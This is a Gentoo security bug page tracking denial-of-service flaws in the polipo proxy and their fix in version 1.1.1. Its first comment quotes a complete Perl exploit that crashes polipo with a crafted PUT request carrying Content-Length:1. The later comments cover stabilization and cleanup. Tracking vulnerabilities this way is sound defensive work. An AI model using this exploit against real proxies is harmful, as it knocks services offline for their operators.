Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 385307 (CVE-2011-3596) - <net-proxy/polipo-1.1.1: multiple vulnerabilities (CVE-{2009-3305,2011-3596})
Summary: <net-proxy/polipo-1.1.1: multiple vulnerabilities (CVE-{2009-3305,2011-3596})
Status: RESOLVED FIXED
Alias: CVE-2011-3596
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal minor (vote)
Assignee: Gentoo Security
URL: http://seclists.org/fulldisclosure/20...
Whiteboard: B3 [noglsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2011-10-02 03:53 UTC by Tim Sammut (RETIRED)
Modified: 2015-11-09 22:05 UTC (History)
3 users (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Tim Sammut (RETIRED) gentoo-dev 2011-10-02 03:53:01 UTC
From the Full-Disclosure posting at $URL:

# Exploit Title: [POLIPO 1.0.4.1 Denial Of Service]
# Date: [10/05/10]
# Author: [Usman Saeed]
# Software Link:[http://www.pps.jussieu.fr/~jch/software/polipo/]
# Version: [1.0.4.1]
# Tested on: [Windows 7 Home]
# CVE : [if exists]
# Code : [exploit code]



Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of this code]

[*] Download Page :http://www.pps.jussieu.fr/~jch/software/polipo/


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Description  : By sending a crafted POST/PUT request to the server
,  the proxy server crashes ! 



[*] Exploitation :


#!/usr/bin/perl
# POLIPO 1.0.4.1 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible
for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [30/09/11]

$host = $ARGV[0];
$PORT = $ARGV[1];


$evil = "PUT / HTTP/1.1\r\n".
"Content-Length:1\r\n\r\n";


use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";





exit;
}


$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr  => $host ,
PeerPort  => $PORT) || die "Cant connect to $host!";
print "+========================================================+\n";
print "+ Program [POLIPO 1.0.4.1 Denial Of Service]             +\n";
print "+ Author [Usman Saeed]                                   +\n";
print "+ Company [Xc0re Security Research Group]                +\n";
print "+ DATE: [30/09/11]                                       +\n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +\n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +\n";
print "+ I would Not be responsible for any misuse of this code]+\n";
print "+========================================================+\n";





print "\n";

print "[*] Initializing\n";

sleep(2);

print "[*] Sendin evil Packet Buhahahahaha \n";

send ($sock , $evil , 0);
print "[*] Crashed :) \n";
$res = recv($sock,$response,1024,0);
print $response;



exit;


-- 
Usman Saeed
Blog : http://www.xc0re.net/blog
Twitter : http://twitter.com/xc0resecurity
Facebook : https://www.facebook.com/pages/Xc0re-Security-Reseach-Group/168397916536539
Comment 1 Andrew Savchenko gentoo-dev 2015-01-09 00:29:16 UTC
Hello,

polipo-1.1.1 is in tree now. It should fix CVE-2011-3596, from CHANGES file:

  * Fail expectations on the local interface.  This might or might not be
    what CVE-2011-3596 is about, difficult to say since nobody is speaking
    to me.

So upstream is not 100% sure, but at least exploit from comment 1 doesn't work anymore: polipo bails out with "405 Method not allowed".

Please not that 1.1.1 also fixes CVE-2009-3305:

  * Fixed a crash that occurs when a server sends a malformed
    Cache-Control: header (CVE-2009-3305). Thanks to Stefan Fritsch.

Vulnerable unstable version is removed. So what is left to stabilize polipo-1.1.1 and remove old stable.
Comment 2 Justin Lecher (RETIRED) gentoo-dev 2015-01-09 08:05:33 UTC
(In reply to Andrew Savchenko from comment #1)
> Vulnerable unstable version is removed. So what is left to stabilize
> polipo-1.1.1 and remove old stable.

Please add arches in CC and tell them with version to stabilize. Also change the title of the bug to reflect which versions are affected.
Comment 3 Andrew Savchenko gentoo-dev 2015-01-09 14:05:47 UTC
Arch teams, please stabilize =net-proxy/polipo-1.1.1.
Comment 4 Andreas Schürch gentoo-dev 2015-01-11 14:13:10 UTC
x86 done.
Comment 5 Agostino Sarubbo gentoo-dev 2015-01-12 10:38:13 UTC
amd64 stable.

Maintainer(s), please cleanup.
Security, please vote.
Comment 6 Andrew Savchenko gentoo-dev 2015-01-12 16:17:33 UTC
All vulnerable versions are removed from tree.
Comment 7 Kristian Fiskerstrand (RETIRED) gentoo-dev 2015-10-31 16:25:44 UTC
GLSA Vote: No
Comment 8 Stefan Behte (RETIRED) gentoo-dev Security 2015-11-09 22:05:20 UTC
Vote: NO.